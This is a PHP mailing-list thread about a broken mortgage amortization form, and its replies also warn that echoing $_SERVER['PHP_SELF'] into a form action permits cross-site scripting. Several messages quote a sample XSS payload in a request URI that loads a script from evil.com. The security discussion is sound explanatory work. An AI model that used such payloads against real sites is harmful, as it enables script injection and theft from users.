Re: [PHP] Division by 0
Op 3/10/10 11:39 PM, Daniel Egeberg schreef: On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban dmi...@ruban.biz wrote: Hi Jochem, Jochem Maas wrote: Op 3/10/10 6:23 PM, Joseph Thayne schreef: Looks to me like you are closing your form before you put anything in it. Therefore, the loan_amount is not set making the value 0. Follow the math, and you are dividing by 1-1. Change this line: form action=?php echo $_SERVER['PHP_SELF']; ? method=post/form to: form action=?php echo $_SERVER['PHP_SELF']; ? method=post this is a XSS waiting to happen. I can put something like the following in the request uri: index.php? onsubmit=evil()script src=http://www.evil.com/evi.js;/script Apparently it's not going to work. PHP_SELF does not include query string. So it is safe to use it this way. Regards, Dmitry No, it is not safe... This won't work: index.php? onsubmit=evil()script src=http://www.evil.com/evi.js;/script But this will: index.php/ onsubmit=evil()script src=http://www.evil.com/evi.js;/script yeah sorry, I was lax and made the query string mistake, the issue stands though as Daniel pointed out. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Division by 0
I love this place, thank you to everyone that posted, I will make changes to make it safer. Thanks again to everyone. gary Jochem Maas joc...@iamjochem.com wrote in message news:4b98de7e.8020...@iamjochem.com... Op 3/10/10 11:39 PM, Daniel Egeberg schreef: On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban dmi...@ruban.biz wrote: Hi Jochem, Jochem Maas wrote: Op 3/10/10 6:23 PM, Joseph Thayne schreef: Looks to me like you are closing your form before you put anything in it. Therefore, the loan_amount is not set making the value 0. Follow the math, and you are dividing by 1-1. Change this line: form action=?php echo $_SERVER['PHP_SELF']; ? method=post/form to: form action=?php echo $_SERVER['PHP_SELF']; ? method=post this is a XSS waiting to happen. I can put something like the following in the request uri: index.php? onsubmit=evil()script src=http://www.evil.com/evi.js;/script Apparently it's not going to work. PHP_SELF does not include query string. So it is safe to use it this way. Regards, Dmitry No, it is not safe... This won't work: index.php? onsubmit=evil()script src=http://www.evil.com/evi.js;/script But this will: index.php/ onsubmit=evil()script src=http://www.evil.com/evi.js;/script yeah sorry, I was lax and made the query string mistake, the issue stands though as Daniel pointed out. __ Information from ESET Smart Security, version of virus signature database 4933 (20100310) __ The message was checked by ESET Smart Security. http://www.eset.com __ Information from ESET Smart Security, version of virus signature database 4933 (20100310) __ The message was checked by ESET Smart Security. http://www.eset.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Division by 0
I have tried and tried, countless times to be removed from this list... still when I go to my deleted items I can see that emails leak through. If there is an administrator who can simply delete me ( simply because I can not seem to do this correctly) I would greatly appreciate it. Thank You! Sincerely, Michael Roberts Executive Recruiter Corporate Staffing Services 150 Monument Road, Suite 510 Bala Cynwyd, PA 19004 P 610-771-1084 F 610-771-0390 E mrobe...@jobscss.com Check out my recent feature article in Professional Surveyor 12/09 edition. http://www.profsurv.com/magazine/article.aspx?i=70379 -Original Message- From: Gary [mailto:gwp...@ptd.net] Sent: Thursday, March 11, 2010 7:51 AM To: php-general@lists.php.net Subject: Re: [PHP] Division by 0 I love this place, thank you to everyone that posted, I will make changes to make it safer. Thanks again to everyone. gary Jochem Maas joc...@iamjochem.com wrote in message news:4b98de7e.8020...@iamjochem.com... Op 3/10/10 11:39 PM, Daniel Egeberg schreef: On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban dmi...@ruban.biz wrote: Hi Jochem, Jochem Maas wrote: Op 3/10/10 6:23 PM, Joseph Thayne schreef: Looks to me like you are closing your form before you put anything in it. Therefore, the loan_amount is not set making the value 0. Follow the math, and you are dividing by 1-1. Change this line: form action=?php echo $_SERVER['PHP_SELF']; ? method=post/form to: form action=?php echo $_SERVER['PHP_SELF']; ? method=post this is a XSS waiting to happen. I can put something like the following in the request uri: index.php? onsubmit=evil()script src=http://www.evil.com/evi.js;/script Apparently it's not going to work. PHP_SELF does not include query string. So it is safe to use it this way. Regards, Dmitry No, it is not safe... This won't work: index.php? onsubmit=evil()script src=http://www.evil.com/evi.js;/script But this will: index.php/ onsubmit=evil()script src=http://www.evil.com/evi.js;/script yeah sorry, I was lax and made the query string mistake, the issue stands though as Daniel pointed out. __ Information from ESET Smart Security, version of virus signature database 4933 (20100310) __ The message was checked by ESET Smart Security. http://www.eset.com __ Information from ESET Smart Security, version of virus signature database 4933 (20100310) __ The message was checked by ESET Smart Security. http://www.eset.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Division by 0
Op 3/11/10 2:44 PM, Mike Roberts schreef: I have tried and tried, countless times to be removed from this list... still when I go to my deleted items I can see that emails leak through. If there is an administrator who can simply delete me ( simply because I can not seem to do this correctly) I would greatly appreciate it. Thank You! no there is not (really!), either search the archives, search php.net look at the bottom of any of the email sent via the list or check the email headers of email sent via the list - any one of those will give you a way out. but that probably is a bit of a technical challenge, so try this: send a blank email to php-general-unsubscr...@lists.php.net using the email account you are subscribed to the list to. all things being equal you should recieve a message saying either that you've been removed or that you need to confirm the removal (which means either replying once more to that message or clicking a link). PS - it's generally considered bad form to reply to someone else's thread rather than send a new message when you're not engaging the current conversation. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Division by 0
Op 3/10/10 6:23 PM, Joseph Thayne schreef: Looks to me like you are closing your form before you put anything in it. Therefore, the loan_amount is not set making the value 0. Follow the math, and you are dividing by 1-1. Change this line: form action=?php echo $_SERVER['PHP_SELF']; ? method=post/form to: form action=?php echo $_SERVER['PHP_SELF']; ? method=post this is a XSS waiting to happen. I can put something like the following in the request uri: index.php? onsubmit=evil()script src=http://www.evil.com/evi.js;/script with regard to the original problem - some input validation is in order. (pow($intCalc,$totalPayments) - 1); if $intCal and $totalPayments are both equal to 1 then either something is wrong and the calc shouldn't be done or some other calc needs to be done. every value being POSTed should be checked that it's been set, and that it's a valid numeric value (for the numeric fields) ... if anything is missing show the form again and display an error message without doing the calculation. and you should be good to go. Joseph Gary wrote: I have a mortgage amortization script that was working fine,now it seems to have gone awry. Below is the entire script plus input page. I am getting an error Warning: Division by zero in /home/content/J/a/y/Jayski/html/one2one/Ricksrecursivefunctions.php on line 47 Which is (pow($intCalc,$totalPayments) - 1); Frankly I am not even sure the information is being passed to the script. Anyone see what I am missing? Gary div id=onecolCalculate your Loan/div div id=leftcontent form action=?php echo $_SERVER['PHP_SELF']; ? method=post/form table tr td style=background-color:#B1D8D8 width=110pxLoan Amount/td tdinput name=loan_amount type=text size=25 / USD/td tda href=javascript:void(0); onmouseover=Tip('This is the amount of money to be loaned.') onmouseout=UnTip()img src=images/help.png class=noborder//a/td /tr tr td style=background-color:#B1D8D8 width=110pxType of Loan/td td select name=type size=1 id=type optionInstallment/option optionBalloon/option /select/td tda href=javascript:void(0); onmouseover=Tip('This is the method of repayment.') onmouseout=UnTip()img src=images/help.png class=noborder//a/td /tr tr td style=background-color:#B1D8D8 width=100pxTerm of Loan/td tdinput name=loan_term type=text size=5 / /selectMonths/td tda href=javascript:void(0); onmouseover=Tip('This is the amount of time that the money is loaned for.') onmouseout=UnTip()img src=images/help.png class=noborder //a/td /tr tr td style=background-color:#B1D8D8 width=140pxInterest Rate/td tdinput name=int_rate type=text size=10 / Per Annum/tdtda href=javascript:void(0); onmouseover=Tip('Percentage (%) charged on loan on an annual basis. br /Please see our FAQs for information on usury rates. br /If no amount is entered this will be 0%.') onmouseout=UnTip()img src=images/help.png class=noborder //a/td /tr /table label input type=submit name=submit id=submit value=submit / /label /form ?php function amortizationTable($paymentNum, $periodicPayment, $balance, $monthlyInterest) { $paymentInterest = round($balance * $monthlyInterest,2); $paymentPrincipal = round($periodicPayment - $paymentInterest,2); $newBalance = round($balance - $paymentPrincipal,2); print tr td$paymentNum/td td\$.number_format($balance,2)./td td\$.number_format($periodicPayment,2)./td td\$.number_format($paymentInterest,2)./td td\$.number_format($paymentPrincipal,2)./td /tr; # If balance not yet zero, recursively call amortizationTable() if ($newBalance 0) { $paymentNum++; amortizationTable($paymentNum, $periodicPayment, $newBalance, $monthlyInterest); } else { exit; } } #end amortizationTable() # Loan balance $balance =($_POST['loan_amount']); # Loan interest rate $interestRate = ($_POST['int_rate']); # Monthly interest rate $monthlyInterest = ($interestRate / 12); # Term length of the loan, in years. $termLength =($_POST['loan_term']); # Number of payments per year. $paymentsPerYear = 12; # Payment iteration $paymentNumber =($_POST['loan_term']); # Perform preliminary calculations $totalPayments = $termLength * $paymentsPerYear; $intCalc = 1 + $interestRate / $paymentsPerYear; $periodicPayment = $balance * pow($intCalc,$totalPayments) * ($intCalc - 1) / (pow($intCalc,$totalPayments) - 1); $periodicPayment = round($periodicPayment,2); # Create table echo table width='50%' align='center' border='1'; print tr thPayment Number/ththBalance/th
Re: [PHP] Division by 0
Joseph My apologise for not writing sooner to thank you, you were of course correct. Thanks again. Gary Joseph Thayne webad...@thaynefam.org wrote in message news:4b97e3a2.2030...@thaynefam.org... Looks to me like you are closing your form before you put anything in it. Therefore, the loan_amount is not set making the value 0. Follow the math, and you are dividing by 1-1. Change this line: form action=?php echo $_SERVER['PHP_SELF']; ? method=post/form to: form action=?php echo $_SERVER['PHP_SELF']; ? method=post and you should be good to go. Joseph Gary wrote: I have a mortgage amortization script that was working fine,now it seems to have gone awry. Below is the entire script plus input page. I am getting an error Warning: Division by zero in /home/content/J/a/y/Jayski/html/one2one/Ricksrecursivefunctions.php on line 47 Which is (pow($intCalc,$totalPayments) - 1); Frankly I am not even sure the information is being passed to the script. Anyone see what I am missing? Gary div id=onecolCalculate your Loan/div div id=leftcontent form action=?php echo $_SERVER['PHP_SELF']; ? method=post/form table tr td style=background-color:#B1D8D8 width=110pxLoan Amount/td tdinput name=loan_amount type=text size=25 / USD/td tda href=javascript:void(0); onmouseover=Tip('This is the amount of money to be loaned.') onmouseout=UnTip()img src=images/help.png class=noborder//a/td /tr tr td style=background-color:#B1D8D8 width=110pxType of Loan/td td select name=type size=1 id=type optionInstallment/option optionBalloon/option /select/td tda href=javascript:void(0); onmouseover=Tip('This is the method of repayment.') onmouseout=UnTip()img src=images/help.png class=noborder//a/td /tr tr td style=background-color:#B1D8D8 width=100pxTerm of Loan/td tdinput name=loan_term type=text size=5 / /selectMonths/td tda href=javascript:void(0); onmouseover=Tip('This is the amount of time that the money is loaned for.') onmouseout=UnTip()img src=images/help.png class=noborder //a/td /tr tr td style=background-color:#B1D8D8 width=140pxInterest Rate/td tdinput name=int_rate type=text size=10 / Per Annum/tdtda href=javascript:void(0); onmouseover=Tip('Percentage (%) charged on loan on an annual basis. br /Please see our FAQs for information on usury rates. br /If no amount is entered this will be 0%.') onmouseout=UnTip()img src=images/help.png class=noborder //a/td /tr /table label input type=submit name=submit id=submit value=submit / /label /form ?php function amortizationTable($paymentNum, $periodicPayment, $balance, $monthlyInterest) { $paymentInterest = round($balance * $monthlyInterest,2); $paymentPrincipal = round($periodicPayment - $paymentInterest,2); $newBalance = round($balance - $paymentPrincipal,2); print tr td$paymentNum/td td\$.number_format($balance,2)./td td\$.number_format($periodicPayment,2)./td td\$.number_format($paymentInterest,2)./td td\$.number_format($paymentPrincipal,2)./td /tr; # If balance not yet zero, recursively call amortizationTable() if ($newBalance 0) { $paymentNum++; amortizationTable($paymentNum, $periodicPayment, $newBalance, $monthlyInterest); } else { exit; } } #end amortizationTable() # Loan balance $balance =($_POST['loan_amount']); # Loan interest rate $interestRate = ($_POST['int_rate']); # Monthly interest rate $monthlyInterest = ($interestRate / 12); # Term length of the loan, in years. $termLength =($_POST['loan_term']); # Number of payments per year. $paymentsPerYear = 12; # Payment iteration $paymentNumber =($_POST['loan_term']); # Perform preliminary calculations $totalPayments = $termLength * $paymentsPerYear; $intCalc = 1 + $interestRate / $paymentsPerYear; $periodicPayment = $balance * pow($intCalc,$totalPayments) * ($intCalc - 1) / (pow($intCalc,$totalPayments) - 1); $periodicPayment = round($periodicPayment,2); # Create table echo table width='50%' align='center' border='1'; print tr thPayment Number/ththBalance/th thPayment/ththInterest/ththPrincipal/th /tr; # Call recursive function amortizationTable($paymentNumber, $periodicPayment, $balance, $monthlyInterest); # Close table print /table; ? /div __ Information from ESET Smart Security, version of virus signature database 4932 (20100310) __ The message was checked by ESET Smart Security. http://www.eset.com __ Information from ESET Smart Security, version of virus signature database 4932 (20100310)
Re: [PHP] Division by 0
On Wed, Mar 10, 2010 at 22:27, Jochem Maas joc...@iamjochem.com wrote: Op 3/10/10 6:23 PM, Joseph Thayne schreef: Looks to me like you are closing your form before you put anything in it. Therefore, the loan_amount is not set making the value 0. Follow the math, and you are dividing by 1-1. Change this line: form action=?php echo $_SERVER['PHP_SELF']; ? method=post/form to: form action=?php echo $_SERVER['PHP_SELF']; ? method=post this is a XSS waiting to happen. I can put something like the following in the request uri: index.php? onsubmit=evil()script src=http://www.evil.com/evi.js;/script with regard to the original problem - some input validation is in order. PHP_SELF doesn't contain the query string, so your particular attack wouldn't work. It's still a security issue though. -- Daniel Egeberg -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Division by 0
Hi Jochem, Jochem Maas wrote: Op 3/10/10 6:23 PM, Joseph Thayne schreef: Looks to me like you are closing your form before you put anything in it. Therefore, the loan_amount is not set making the value 0. Follow the math, and you are dividing by 1-1. Change this line: form action=?php echo $_SERVER['PHP_SELF']; ? method=post/form to: form action=?php echo $_SERVER['PHP_SELF']; ? method=post this is a XSS waiting to happen. I can put something like the following in the request uri: index.php? onsubmit=evil()script src=http://www.evil.com/evi.js;/script Apparently it's not going to work. PHP_SELF does not include query string. So it is safe to use it this way. Regards, Dmitry -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Division by 0
On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban dmi...@ruban.biz wrote: Hi Jochem, Jochem Maas wrote: Op 3/10/10 6:23 PM, Joseph Thayne schreef: Looks to me like you are closing your form before you put anything in it. Therefore, the loan_amount is not set making the value 0. Follow the math, and you are dividing by 1-1. Change this line: form action=?php echo $_SERVER['PHP_SELF']; ? method=post/form to: form action=?php echo $_SERVER['PHP_SELF']; ? method=post this is a XSS waiting to happen. I can put something like the following in the request uri: index.php? onsubmit=evil()script src=http://www.evil.com/evi.js;/script Apparently it's not going to work. PHP_SELF does not include query string. So it is safe to use it this way. Regards, Dmitry No, it is not safe... This won't work: index.php? onsubmit=evil()script src=http://www.evil.com/evi.js;/script But this will: index.php/ onsubmit=evil()script src=http://www.evil.com/evi.js;/script -- Daniel Egeberg -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php